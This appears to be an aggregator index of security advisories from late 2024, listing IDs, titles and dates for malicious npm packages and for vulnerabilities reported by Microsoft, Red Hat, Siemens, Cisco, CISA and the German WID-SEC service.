mal-2024-11198 Malicious code in web3-executor (npm) 2024-12-04T04:54:47Z 2024-12-04T04:54:47Z
mal-2024-11197 Malicious code in stacks-blockchain-dist-tool (npm) 2024-12-04T04:52:06Z 2024-12-04T04:52:11Z
mal-2024-11191 Malicious code in auto-cancel-redundant-job (npm) 2024-12-04T04:52:06Z 2024-12-04T04:52:11Z
mal-2024-11196 Malicious code in set-pr-description-action (npm) 2024-12-04T04:52:06Z 2024-12-04T04:52:07Z
mal-2024-11193 Malicious code in codat-docs (npm) 2024-12-04T04:52:06Z 2024-12-04T04:52:07Z
mal-2024-11194 Malicious code in com.immutable.marketplace (npm) 2024-12-04T04:52:06Z 2024-12-04T04:52:06Z
mal-2024-11192 Malicious code in basic-preset-minting (npm) 2024-12-04T04:52:06Z 2024-12-04T04:52:06Z
mal-2024-11184 Malicious code in dcapps-cli (npm) 2024-12-03T23:34:52Z 2024-12-03T23:34:53Z
mal-2024-11182 Malicious code in @0xengine/xmlrpc (npm) 2024-12-03T11:38:01Z 2024-12-03T11:38:02Z
mal-2024-11164 Malicious code in acm-nano-logger-fe (npm) 2024-12-02T06:38:26Z 2024-12-02T06:38:26Z
mal-2024-11181 Malicious code in synch-prod-ai (npm) 2024-12-02T05:33:28Z 2024-12-02T05:33:28Z
mal-2024-11163 Malicious code in @hmp/h-shelves (npm) 2024-12-02T02:31:10Z 2024-12-02T03:20:58Z
mal-2024-11022 Malicious code in @hmp/casepaper (npm) 2024-11-27T03:20:58Z 2024-12-02T03:20:58Z
mal-2024-11162 Malicious code in @hmp/h-image-uploader (npm) 2024-12-02T02:27:07Z 2024-12-02T02:27:07Z
mal-2024-11180 Malicious code in tauri-plugin-autostart-api (npm) 2024-12-01T19:53:52Z 2024-12-01T19:53:52Z
mal-2024-11179 Malicious code in tailchat-service-swagger-generator (npm) 2024-12-01T19:22:57Z 2024-12-01T19:22:57Z
mal-2024-11178 Malicious code in tailchat-service-openapi-generator (npm) 2024-12-01T18:53:45Z 2024-12-01T18:53:45Z
mal-2024-11177 Malicious code in spinal-service-ticket (npm) 2024-12-01T18:38:34Z 2024-12-01T18:38:34Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
wid-sec-w-2024-1856 IBM WebSphere Application Server: Mehrere Schwachstellen ermöglichen Offenlegung von Informationen 2024-08-14T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-1722 Linux Kernel: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff 2024-07-29T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-1658 Oracle Java SE: Mehrere Schwachstellen 2024-07-16T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-1504 Apache HTTP Server: Mehrere Schwachstellen 2024-07-01T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-1418 Linux Kernel: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff 2024-06-19T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-1268 Linux Kernel: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff 2024-06-02T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-1259 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service und unspezifischen Angriff 2024-05-30T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-1197 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service und unspezifische Angriffe 2024-05-21T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-1188 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service 2024-05-20T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-1108 Linux Kernel: Mehrere Schwachstellen 2024-05-13T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-0964 Linux Kernel: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff 2024-04-24T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-0913 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service 2024-04-16T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-0911 Red Hat Enterprise Linux (pcs): Mehrere Schwachstellen ermöglichen Denial of Service 2024-04-16T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-0854 VMware Tanzu Spring Framework: Schwachstelle ermöglicht Manipulation von Daten 2024-04-10T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-0639 VMware Tanzu Spring Framework: Schwachstelle ermöglicht Manipulation von Dateien 2024-03-14T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-0462 Ruby on Rails: Mehrere Schwachstellen 2024-02-21T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-0457 VMware Tanzu Spring Framework: Schwachstelle ermöglicht Offenlegung von Informationen 2024-02-21T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-0272 docker: Mehrere Schwachstellen 2024-01-31T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2023-3141 bzip2: Schwachstelle ermöglicht Ausführen von beliebigem Programmcode mit den Rechten des Dienstes 2019-06-23T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2023-2838 OpenSSL: Schwachstelle ermöglicht Denial of Service 2023-11-06T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2023-2618 http/2 Implementierungen: Schwachstelle ermöglicht Denial of Service 2023-10-10T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2023-1938 Golang Go: Mehrere Schwachstellen 2023-08-01T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2023-0953 Linux Kernel: Schwachstelle ermöglicht Privilegieneskalation 2023-04-12T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
WID-SEC-W-2024-3615 Zammad: Schwachstelle ermöglicht Offenlegung von Informationen 2024-12-04T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
WID-SEC-W-2024-3614 IBM InfoSphere Information Server: Mehrere Schwachstellen 2024-12-04T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
WID-SEC-W-2024-3613 IBM App Connect Enterprise: Schwachstelle ermöglicht Codeausführung 2024-12-04T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
WID-SEC-W-2024-3612 Drupal: Mehrere Schwachstellen 2024-12-04T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
WID-SEC-W-2024-3611 Joomla: Schwachstelle ermöglicht Cross-Site Scripting 2024-12-04T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
WID-SEC-W-2024-3610 Cisco NX-OS: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen 2024-12-04T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
WID-SEC-W-2024-3609 Django: Mehrere Schwachstellen 2024-12-04T23:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
ssa-039007 SSA-039007: Heap-based Buffer Overflow Vulnerability in User Management Component (UMC) 2024-09-10T00:00:00Z 2024-11-12T00:00:00Z
ssa-000297 SSA-000297: Multiple SQLite Vulnerabilities in RUGGEDCOM CROSSBOW Station Access Controller Before V5.6 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
SSA-962515 SSA-962515: Out of Bounds Read Vulnerability in Industrial Products 2024-05-14T00:00:00Z 2024-11-12T00:00:00Z
SSA-915275 SSA-915275: Multiple Vulnerabilities in SINEC INS Before V1.0 SP2 Update 3 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
SSA-914892 SSA-914892: Race Condition Vulnerability in Basic Authentication Implementation of Mendix Runtime 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
SSA-883918 SSA-883918: Information Disclosure Vulnerability in SIMATIC WinCC 2024-07-09T00:00:00Z 2024-11-12T00:00:00Z
SSA-876787 SSA-876787: Open Redirect Vulnerability in SIMATIC S7-1500 and S7-1200 CPUs 2024-10-08T00:00:00Z 2024-11-12T00:00:00Z
SSA-871035 SSA-871035: Session-Memory Deserialization Vulnerability in Siemens Engineering Platforms Before V19 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
SSA-773256 SSA-773256: Impact of Socket.IO CVE-2024-38355 on Siemens Industrial Products 2024-09-10T00:00:00Z 2024-11-12T00:00:00Z
SSA-723487 SSA-723487: RADIUS Protocol Susceptible to Forgery Attacks (CVE-2024-3596) - Impact to SCALANCE, RUGGEDCOM and Related Products 2024-07-09T00:00:00Z 2024-11-12T00:00:00Z
SSA-654798 SSA-654798: Incorrect Authorization Vulnerability in SIMATIC CP 1543-1 Devices 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
SSA-629254 SSA-629254: Remote Code Execution Vulnerability in SIMATIC SCADA and PCS 7 systems 2024-09-10T00:00:00Z 2024-11-12T00:00:00Z
SSA-616032 SSA-616032: Local Privilege Escalation Vulnerability in Spectrum Power 7 Before V24Q3 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
SSA-599968 SSA-599968: Denial-of-Service Vulnerability in Profinet Devices 2021-07-13T00:00:00Z 2024-11-12T00:00:00Z
SSA-454789 SSA-454789: Deserialization Vulnerability in TeleControl Server Basic V3.1 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
SSA-398330 SSA-398330: Vulnerabilities in the additional GNU/Linux subsystem of the SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP V3.1 2023-12-12T00:00:00Z 2024-11-12T00:00:00Z
SSA-364175 SSA-364175: Multiple Vulnerabilities in Palo Alto Networks Virtual NGFW on RUGGEDCOM APE1808 Devices Before V11.1.4-h1 2024-07-09T00:00:00Z 2024-11-12T00:00:00Z
SSA-354112 SSA-354112: Multiple Vulnerabilities in SCALANCE M-800 Family Before V8.2 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
SSA-351178 SSA-351178: Multiple Vulnerabilities in Solid Edge Before SE2024 Update 9 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
SSA-331112 SSA-331112: Multiple Vulnerabilities in SINEC NMS Before V3.0 SP1 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
SSA-265688 SSA-265688: Vulnerabilities in the additional GNU/Linux subsystem of the SIMATIC S7-1500 TM MFP V1.1 2024-04-09T00:00:00Z 2024-11-12T00:00:00Z
SSA-230445 SSA-230445: Stored XSS Vulnerability in OZW Web Servers Before V5.2 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
SSA-064257 SSA-064257: Privilege Escalation Vulnerability in SIPORT Before V3.4.0 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
SSA-054046 SSA-054046: Unauthenticated Information Disclosure in Web Server of SIMATIC S7-1500 CPUs 2024-10-08T00:00:00Z 2024-11-12T00:00:00Z
SSA-039007 SSA-039007: Heap-based Buffer Overflow Vulnerability in User Management Component (UMC) 2024-09-10T00:00:00Z 2024-11-12T00:00:00Z
SSA-000297 SSA-000297: Multiple SQLite Vulnerabilities in RUGGEDCOM CROSSBOW Station Access Controller Before V5.6 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
ssa-333468 SSA-333468: Multiple Vulnerabilities in InterMesh Subscriber Devices 2024-10-23T00:00:00Z 2024-10-23T00:00:00Z
SSA-333468 SSA-333468: Multiple Vulnerabilities in InterMesh Subscriber Devices 2024-10-23T00:00:00Z 2024-10-23T00:00:00Z
ssa-438590 SSA-438590: Buffer Overflow Vulnerability in Siveillance Video Camera Drivers 2024-10-10T00:00:00Z 2024-10-10T00:00:00Z
SSA-438590 SSA-438590: Buffer Overflow Vulnerability in Siveillance Video Camera Drivers 2024-10-10T00:00:00Z 2024-10-10T00:00:00Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
rhsa-2024:0664 Red Hat Security Advisory: OpenShift Container Platform 4.12.49 bug fix update and security update 2024-02-08T19:31:18+00:00 2025-01-18T00:11:40+00:00
rhsa-2024:0642 Red Hat Security Advisory: OpenShift Container Platform 4.14.11 bug fix and security update 2024-02-07T17:36:34+00:00 2025-01-18T00:11:24+00:00
rhsa-2024:0302 Red Hat Security Advisory: Kube Descheduler Operator for Red Hat OpenShift 5.0.0 for RHEL 9:security update 2024-03-06T13:33:21+00:00 2025-01-18T00:11:23+00:00
rhsa-2024:0269 Red Hat Security Advisory: Run Once Duration Override Operator for Red Hat OpenShift 1.1.0 for RHEL 9 2024-02-28T00:20:04+00:00 2025-01-18T00:11:12+00:00
rhsa-2024:0660 Red Hat Security Advisory: OpenShift Container Platform 4.13.32 bug fix and security update 2024-02-07T15:07:37+00:00 2025-01-18T00:11:09+00:00
rhsa-2024:0290 Red Hat Security Advisory: OpenShift Container Platform 4.14.10 bug fix and security update 2024-01-23T20:26:08+00:00 2025-01-18T00:10:58+00:00
rhsa-2024:0484 Red Hat Security Advisory: OpenShift Container Platform 4.13.31 bug fix and security update 2024-02-01T19:01:48+00:00 2025-01-18T00:10:54+00:00
rhsa-2024:0198 Red Hat Security Advisory: OpenShift Container Platform 4.12.47 security update 2024-01-17T18:20:55+00:00 2025-01-18T00:10:43+00:00
rhsa-2024:0485 Red Hat Security Advisory: OpenShift Container Platform 4.12.48 bug fix and security update 2024-01-31T16:17:59+00:00 2025-01-18T00:10:39+00:00
rhsa-2024:0193 Red Hat Security Advisory: OpenShift Container Platform 4.13.29 bug fix and security update 2024-01-17T09:48:09+00:00 2025-01-18T00:10:32+00:00
rhsa-2024:0306 Red Hat Security Advisory: OpenShift Container Platform 4.11.57 bug fix and security update 2024-01-24T20:54:46+00:00 2025-01-18T00:10:26+00:00
rhsa-2024:0273 Red Hat Security Advisory: OpenShift Virtualization 4.12.9 Images security and bug fix update 2024-01-17T08:29:36+00:00 2025-01-18T00:10:19+00:00
rhsa-2024:0059 Red Hat Security Advisory: OpenShift Container Platform 4.11.56 bug fix and security update 2024-01-10T00:23:49+00:00 2025-01-18T00:10:07+00:00
rhsa-2023:7823 Red Hat Security Advisory: OpenShift Container Platform 4.12.46 bug fix and security update 2024-01-04T14:41:38+00:00 2025-01-18T00:10:00+00:00
rhsa-2024:0050 Red Hat Security Advisory: OpenShift Container Platform 4.14.8 bug fix and security update 2024-01-09T16:55:38+00:00 2025-01-18T00:09:55+00:00
rhsa-2023:7691 Red Hat Security Advisory: OpenShift Container Platform 4.11.55 bug fix and security update 2023-12-13T21:44:50+00:00 2025-01-18T00:09:46+00:00
rhsa-2023:7827 Red Hat Security Advisory: OpenShift Container Platform 4.13.z security update 2024-01-04T14:22:05+00:00 2025-01-18T00:09:44+00:00
rhsa-2023:7690 Red Hat Security Advisory: OpenShift Container Platform 4.11.55 security update 2023-12-13T21:03:30+00:00 2025-01-18T00:09:36+00:00
rhsa-2023:7831 Red Hat Security Advisory: OpenShift Container Platform 4.14.7 bug fix and security update 2024-01-03T20:04:32+00:00 2025-01-18T00:09:33+00:00
rhsa-2023:7687 Red Hat Security Advisory: OpenShift Container Platform 4.13.26 bug fix and security update 2023-12-13T00:13:20+00:00 2025-01-18T00:09:25+00:00
rhsa-2023:7682 Red Hat Security Advisory: OpenShift Container Platform 4.14.6 bug fix and security update 2023-12-12T09:48:40+00:00 2025-01-18T00:09:14+00:00
rhsa-2023:7608 Red Hat Security Advisory: OpenShift Container Platform 4.12.45 bug fix and security update 2023-12-06T17:55:11+00:00 2025-01-18T00:09:11+00:00
rhsa-2023:7741 Red Hat Security Advisory: Red Hat Ceph Storage 6.1 security, enhancements, and bug fix update 2023-12-12T13:55:37+00:00 2025-01-18T00:09:04+00:00
rhsa-2023:7607 Red Hat Security Advisory: OpenShift Container Platform 4.12.45 security and extras update 2023-12-06T16:54:41+00:00 2025-01-18T00:09:01+00:00
rhsa-2023:7710 Red Hat Security Advisory: Red Hat OpenShift for Windows Containers 7.2.0 security update 2023-12-11T00:20:04+00:00 2025-01-18T00:08:55+00:00
rhsa-2023:7604 Red Hat Security Advisory: OpenShift Container Platform 4.13.25 bug fix and security update 2023-12-06T00:34:23+00:00 2025-01-18T00:08:51+00:00
rhsa-2023:7704 Red Hat Security Advisory: OpenShift Virtualization 4.14.1 security and bug fix update 2023-12-07T15:00:28+00:00 2025-01-18T00:08:45+00:00
rhsa-2023:7602 Red Hat Security Advisory: OpenShift Container Platform 4.13.25 security and extras update 2023-12-06T00:16:04+00:00 2025-01-18T00:08:43+00:00
rhsa-2023:7703 Red Hat Security Advisory: Red Hat OpenShift Pipelines 1.10.6 release and security update 2023-12-07T14:57:07+00:00 2025-01-18T00:08:35+00:00
rhsa-2023:7662 Red Hat Security Advisory: Red Hat OpenShift for Windows Containers 6.0.3 security update 2023-12-06T00:20:48+00:00 2025-01-18T00:08:32+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
msrc_cve-2024-49115 Windows Remote Desktop Services Remote Code Execution Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49114 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49113 Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49111 Wireless Wide Area Network Service (WwanSvc) Elevation of Privilege Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49110 Windows Mobile Broadband Driver Elevation of Privilege Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49109 Wireless Wide Area Network Service (WwanSvc) Elevation of Privilege Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49108 Windows Remote Desktop Services Remote Code Execution Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49107 WmsRepair Service Elevation of Privilege Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49106 Windows Remote Desktop Services Remote Code Execution Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49105 Remote Desktop Client Remote Code Execution Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49104 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49103 Windows Wireless Wide Area Network Service (WwanSvc) Information Disclosure Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49102 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49101 Wireless Wide Area Network Service (WwanSvc) Elevation of Privilege Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49099 Windows Wireless Wide Area Network Service (WwanSvc) Information Disclosure Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49098 Windows Wireless Wide Area Network Service (WwanSvc) Information Disclosure Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49097 Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49096 Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49095 Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49094 Wireless Wide Area Network Service (WwanSvc) Elevation of Privilege Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49093 Windows Resilient File System (ReFS) Elevation of Privilege Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49092 Windows Mobile Broadband Driver Elevation of Privilege Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49091 Windows Domain Name Service Remote Code Execution Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49090 Windows Common Log File System Driver Elevation of Privilege Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49089 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49088 Windows Common Log File System Driver Elevation of Privilege Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49087 Windows Mobile Broadband Driver Information Disclosure Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49086 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49085 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49084 Windows Kernel Elevation of Privilege Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
va-24-325-01 Versa Networks Versa Director insecure default PostgreSQL configuration 2024-11-20T18:33:57Z 2024-11-20T18:33:57Z
VA-24-325-01 Versa Networks Versa Director insecure default PostgreSQL configuration 2024-11-20T18:33:57Z 2024-11-20T18:33:57Z
icsa-24-324-01 Mitsubishi Electric MELSEC iQ-F Series 2024-11-19T07:00:00.000000Z 2024-11-19T07:00:00.000000Z
ICSA-24-324-01 Mitsubishi Electric MELSEC iQ-F Series 2024-11-19T07:00:00.000000Z 2024-11-19T07:00:00.000000Z
icsa-24-319-14 Rockwell Automation FactoryTalk Updater (Update A) 2024-11-14T07:00:00.000000Z 2024-11-18T07:00:00.000000Z
icsa-24-319-13 Rockwell Automation Verve Reporting (Update A) 2024-11-14T07:00:00.000000Z 2024-11-18T07:00:00.000000Z
ICSA-24-319-14 Rockwell Automation FactoryTalk Updater (Update A) 2024-11-14T07:00:00.000000Z 2024-11-18T07:00:00.000000Z
ICSA-24-319-13 Rockwell Automation Verve Reporting (Update A) 2024-11-14T07:00:00.000000Z 2024-11-18T07:00:00.000000Z
va-24-201-01 Adminer and AdminerEvo Multiple Vulnerabilities 2024-07-19T16:00:00Z 2024-11-14T17:00:00Z
VA-24-201-01 Adminer and AdminerEvo Multiple Vulnerabilities 2024-07-19T16:00:00Z 2024-11-14T17:00:00Z
icsma-24-319-01 Baxter Life2000 Ventilation System 2024-11-14T07:00:00.000000Z 2024-11-14T07:00:00.000000Z
icsa-24-319-17 2N Access Commander 2024-11-14T07:00:00.000000Z 2024-11-14T07:00:00.000000Z
icsa-24-319-16 Hitachi Energy MSM 2024-11-14T07:00:00.000000Z 2024-11-14T07:00:00.000000Z
icsa-24-319-15 Rockwell Automation Arena Input Analyzer 2024-11-14T07:00:00.000000Z 2024-11-14T07:00:00.000000Z
icsa-24-291-01 Elvaco M-Bus Metering Gateway CMe3100 (Update A) 2024-10-17T06:00:00.000000Z 2024-11-14T07:00:00.000000Z
ICSMA-24-319-01 Baxter Life2000 Ventilation System 2024-11-14T07:00:00.000000Z 2024-11-14T07:00:00.000000Z
ICSA-24-319-17 2N Access Commander 2024-11-14T07:00:00.000000Z 2024-11-14T07:00:00.000000Z
ICSA-24-319-16 Hitachi Energy MSM 2024-11-14T07:00:00.000000Z 2024-11-14T07:00:00.000000Z
ICSA-24-319-15 Rockwell Automation Arena Input Analyzer 2024-11-14T07:00:00.000000Z 2024-11-14T07:00:00.000000Z
ICSA-24-291-01 Elvaco M-Bus Metering Gateway CMe3100 (Update A) 2024-10-17T06:00:00.000000Z 2024-11-14T07:00:00.000000Z
va-24-317-01 Ivanti Connect Secure and Ivanti Policy Secure Multiple Vulnerabilities 2024-11-13T20:32:00Z 2024-11-13T20:32:00Z
VA-24-317-01 Ivanti Connect Secure and Ivanti Policy Secure Multiple Vulnerabilities 2024-11-13T20:32:00Z 2024-11-13T20:32:00Z
icsa-24-317-03 Rockwell Automation FactoryTalk View ME 2024-11-12T07:00:00.000000Z 2024-11-12T07:00:00.000000Z
icsa-24-317-02 Hitachi Energy TRO600 2024-11-12T07:00:00.000000Z 2024-11-12T07:00:00.000000Z
icsa-24-317-01 Subnet Solutions PowerSYSTEM Center 2024-11-12T07:00:00.000000Z 2024-11-12T07:00:00.000000Z
icsa-23-306-03 Mitsubishi Electric FA products (Update A) 2023-11-02T06:00:00.000000Z 2024-11-12T07:00:00.000000Z
icsa-23-136-01 Snap One OvrC Cloud (Update A) 2023-05-16T06:00:00.000000Z 2024-11-12T07:00:00.000000Z
ICSA-24-317-03 Rockwell Automation FactoryTalk View ME 2024-11-12T07:00:00.000000Z 2024-11-12T07:00:00.000000Z
ICSA-24-317-02 Hitachi Energy TRO600 2024-11-12T07:00:00.000000Z 2024-11-12T07:00:00.000000Z
ICSA-24-317-01 Subnet Solutions PowerSYSTEM Center 2024-11-12T07:00:00.000000Z 2024-11-12T07:00:00.000000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
cisco-sa-ece-dos-Oqb9uFEv Cisco Enterprise Chat and Email Denial of Service Vulnerability 2024-11-06T16:00:00+00:00 2024-11-06T16:00:00+00:00
cisco-sa-cucm-xss-svckmmw Cisco Unified Communications Manager Cross-Site Scripting Vulnerability 2024-11-06T16:00:00+00:00 2024-11-06T16:00:00+00:00
cisco-sa-cucm-xss-SVCkMMW Cisco Unified Communications Manager Cross-Site Scripting Vulnerability 2024-11-06T16:00:00+00:00 2024-11-06T16:00:00+00:00
cisco-sa-cmm-info-disc-9zemahga Cisco Meeting Management Information Disclosure Vulnerability 2024-11-06T16:00:00+00:00 2024-11-06T16:00:00+00:00
cisco-sa-cmm-info-disc-9ZEMAhGA Cisco Meeting Management Information Disclosure Vulnerability 2024-11-06T16:00:00+00:00 2024-11-06T16:00:00+00:00
cisco-sa-ccmp-sxss-qbtdbzdd Cisco Unified Contact Center Management Portal Stored Cross-Site Scripting Vulnerability 2024-11-06T16:00:00+00:00 2024-11-06T16:00:00+00:00
cisco-sa-ccmp-sxss-qBTDBZDD Cisco Unified Contact Center Management Portal Stored Cross-Site Scripting Vulnerability 2024-11-06T16:00:00+00:00 2024-11-06T16:00:00+00:00
cisco-sa-backhaul-ap-cmdinj-r7e28ecs Cisco Unified Industrial Wireless Software for Ultra-Reliable Wireless Backhaul Access Point Command Injection Vulnerability 2024-11-06T16:00:00+00:00 2024-11-06T16:00:00+00:00
cisco-sa-backhaul-ap-cmdinj-R7E28Ecs Cisco Unified Industrial Wireless Software for Ultra-Reliable Wireless Backhaul Access Point Command Injection Vulnerability 2024-11-06T16:00:00+00:00 2024-11-06T16:00:00+00:00
cisco-sa-3550-acl-bypass-mhskzc2q Cisco Nexus 3550-F Switches Access Control List Programming Vulnerability 2024-11-06T16:00:00+00:00 2024-11-06T16:00:00+00:00
cisco-sa-3550-acl-bypass-mhskZc2q Cisco Nexus 3550-F Switches Access Control List Programming Vulnerability 2024-11-06T16:00:00+00:00 2024-11-06T16:00:00+00:00
cisco-sa-asaftd-acl-bypass-vvnlnkqf Cisco Adaptive Security Appliance and Firepower Threat Defense Software AnyConnect Access Control List Bypass Vulnerabilities 2024-10-23T16:00:00+00:00 2024-10-24T21:19:17+00:00
cisco-sa-asaftd-acl-bypass-VvnLNKqf Cisco Adaptive Security Appliance and Firepower Threat Defense Software AnyConnect Access Control List Bypass Vulnerabilities 2024-10-23T16:00:00+00:00 2024-10-24T21:19:17+00:00
cisco-sa-fmc-xss-infodisc-rl4mjfer Cisco Secure Firewall Management Center Software Cross-Site Scripting and Information Disclosure Vulnerabilities 2024-10-23T16:00:00+00:00 2024-10-24T11:52:38+00:00
cisco-sa-fmc-xss-infodisc-RL4mJFer Cisco Secure Firewall Management Center Software Cross-Site Scripting and Information Disclosure Vulnerabilities 2024-10-23T16:00:00+00:00 2024-10-24T11:52:38+00:00
cisco-sa-ata19x-multi-rdteqrsy Cisco ATA 190 Series Analog Telephone Adapter Firmware Vulnerabilities 2024-10-16T16:00:00+00:00 2024-10-24T11:47:37+00:00
cisco-sa-ata19x-multi-RDTEqRsy Cisco ATA 190 Series Analog Telephone Adapter Firmware Vulnerabilities 2024-10-16T16:00:00+00:00 2024-10-24T11:47:37+00:00
cisco-sa-snort-rf-bypass-OY8f3pnM Multiple Cisco Products Snort Rate Filter Bypass Vulnerability 2024-10-23T16:00:00+00:00 2025-01-13T16:44:31+00:00
cisco-sa-snort-bypass-ptry37fx Cisco Firepower Threat Defense Software TCP Snort 3 Detection Engine Bypass Vulnerability 2024-10-23T16:00:00+00:00 2024-10-23T16:00:00+00:00
cisco-sa-snort-bypass-PTry37fX Cisco Firepower Threat Defense Software TCP Snort 3 Detection Engine Bypass Vulnerability 2024-10-23T16:00:00+00:00 2024-10-23T16:00:00+00:00
